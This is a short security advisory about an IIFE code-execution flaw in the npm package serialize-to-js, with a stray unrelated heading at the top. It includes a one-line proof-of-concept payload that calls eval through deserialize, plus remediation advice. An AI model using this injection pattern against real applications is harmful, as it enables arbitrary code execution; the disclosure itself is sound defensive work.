Nanoscale Parts Manufacturing
Severity: critical

Code Execution Through IIFE

serialize-to-js

Overview

Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).

Proof of Concept

var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }"
var serialize = require('serialize-to-js');
serialize.deserialize(payload);

Remediation

Update to version 1.0.0, or later, and review this disclaimer from the author.

Advisory timeline

  1. published

    Advisory published
    Feb 10th, 2017
  2. reported

    Feb 10th, 2017